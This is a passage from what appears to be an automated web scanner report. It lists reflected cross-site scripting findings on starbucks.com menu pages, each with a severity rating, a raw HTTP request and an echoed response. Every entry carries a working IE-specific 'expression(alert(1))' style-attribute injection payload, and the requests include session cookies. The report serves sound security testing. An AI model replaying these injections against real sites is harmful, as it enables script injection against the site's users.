Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:44 GMT
Connection: close
Content-Length: 41017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast?75a68"style="x:expression(alert(1))"76d19496ed1=1"/>
...[SNIP]...

2.102. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/iced-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfea6"style%3d"x%3aexpression(alert(1))"8ec24fe6e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfea6"style="x:expression(alert(1))"8ec24fe6e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/iced-coffee?dfea6"style%3d"x%3aexpression(alert(1))"8ec24fe6e3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:44 GMT
Connection: close
Content-Length: 41110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee?dfea6"style="x:expression(alert(1))"8ec24fe6e3=1"/>
...[SNIP]...

2.103. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/pikes-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127b0"style%3d"x%3aexpression(alert(1))"1a2f3296cc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 127b0"style="x:expression(alert(1))"1a2f3296cc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/pikes-place-roast?127b0"style%3d"x%3aexpression(alert(1))"1a2f3296cc8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:19 GMT
Connection: close
Content-Length: 40828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast?127b0"style="x:expression(alert(1))"1a2f3296cc8=1"/>
...[SNIP]...

2.104. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53d6"style%3d"x%3aexpression(alert(1))"103b6e338a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e53d6"style="x:expression(alert(1))"103b6e338a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/chocolate/hot-chocolate?e53d6"style%3d"x%3aexpression(alert(1))"103b6e338a0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:52 GMT
Connection: close
Content-Length: 41071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate?e53d6"style="x:expression(alert(1))"103b6e338a0=1"/>
...[SNIP]...

2.105. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/peppermint-mocha-hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601a4"style%3d"x%3aexpression(alert(1))"868c1ee823c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 601a4"style="x:expression(alert(1))"868c1ee823c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/chocolate/peppermint-mocha-hot-chocolate?601a4"style%3d"x%3aexpression(alert(1))"868c1ee823c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:26 GMT
Connection: close
Content-Length: 41286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate?601a4"style="x:expression(alert(1))"868c1ee823c=1"/>
...[SNIP]...

2.106. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/salted-caramel-hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d695f"style%3d"x%3aexpression(alert(1))"8d2325f8a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d695f"style="x:expression(alert(1))"8d2325f8a6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/chocolate/salted-caramel-hot-chocolate?d695f"style%3d"x%3aexpression(alert(1))"8d2325f8a6d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:48 GMT
Connection: close
Content-Length: 41575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate?d695f"style="x:expression(alert(1))"8d2325f8a6d=1"/>
...[SNIP]...

2.107. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/white-hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5391b"style%3d"x%3aexpression(alert(1))"a19b060ce42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5391b"style="x:expression(alert(1))"a19b060ce42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/chocolate/white-hot-chocolate?5391b"style%3d"x%3aexpression(alert(1))"a19b060ce42=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:26 GMT
Connection: close
Content-Length: 41166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate?5391b"style="x:expression(alert(1))"a19b060ce42=1"/>
...[SNIP]...

2.108. http://www.starbucks.com/menu/drinks/espresso/caffe-americano [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-americano

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f255"style%3d"x%3aexpression(alert(1))"4510f38bf85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f255"style="x:expression(alert(1))"4510f38bf85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/caffe-americano?6f255"style%3d"x%3aexpression(alert(1))"4510f38bf85=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:09 GMT
Connection: close
Content-Length: 42932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-americano?6f255"style="x:expression(alert(1))"4510f38bf85=1"/>
...[SNIP]...

2.109. http://www.starbucks.com/menu/drinks/espresso/caffe-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40a7"style%3d"x%3aexpression(alert(1))"30887b94fb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b40a7"style="x:expression(alert(1))"30887b94fb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/caffe-latte?b40a7"style%3d"x%3aexpression(alert(1))"30887b94fb0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:55 GMT
Connection: close
Content-Length: 42713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-latte?b40a7"style="x:expression(alert(1))"30887b94fb0=1"/>
...[SNIP]...

2.110. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45914"style%3d"x%3aexpression(alert(1))"d584cd48a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45914"style="x:expression(alert(1))"d584cd48a51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/caffe-mocha?45914"style%3d"x%3aexpression(alert(1))"d584cd48a51=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:49 GMT
Connection: close
Content-Length: 43114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-mocha?45914"style="x:expression(alert(1))"d584cd48a51=1"/>
...[SNIP]...

2.111. http://www.starbucks.com/menu/drinks/espresso/cappuccino [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cappuccino

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e145"style%3d"x%3aexpression(alert(1))"9afccd69e4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e145"style="x:expression(alert(1))"9afccd69e4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/cappuccino?7e145"style%3d"x%3aexpression(alert(1))"9afccd69e4b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:17 GMT
Connection: close
Content-Length: 42857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/cappuccino?7e145"style="x:expression(alert(1))"9afccd69e4b=1"/>
...[SNIP]...

2.112. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-brulee-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbaa"style%3d"x%3aexpression(alert(1))"edc31d198d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fbaa"style="x:expression(alert(1))"edc31d198d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/caramel-brulee-latte?9fbaa"style%3d"x%3aexpression(alert(1))"edc31d198d3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:22 GMT
Connection: close
Content-Length: 43406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte?9fbaa"style="x:expression(alert(1))"edc31d198d3=1"/>
...[SNIP]...

2.113. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c9c"style%3d"x%3aexpression(alert(1))"2b341b0daca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46c9c"style="x:expression(alert(1))"2b341b0daca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/caramel-macchiato?46c9c"style%3d"x%3aexpression(alert(1))"2b341b0daca=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:08 GMT
Connection: close
Content-Length: 43191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato?46c9c"style="x:expression(alert(1))"2b341b0daca=1"/>
...[SNIP]...

2.114. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cinnamon-dolce-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f06"style%3d"x%3aexpression(alert(1))"edbeba63995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20f06"style="x:expression(alert(1))"edbeba63995 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/cinnamon-dolce-latte?20f06"style%3d"x%3aexpression(alert(1))"edbeba63995=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:18 GMT
Connection: close
Content-Length: 43087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte?20f06"style="x:expression(alert(1))"edbeba63995=1"/>
...[SNIP]...

2.115. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/eggnog-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fbe1"style%3d"x%3aexpression(alert(1))"947cd8ab9f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5fbe1"style="x:expression(alert(1))"947cd8ab9f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/eggnog-latte?5fbe1"style%3d"x%3aexpression(alert(1))"947cd8ab9f7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
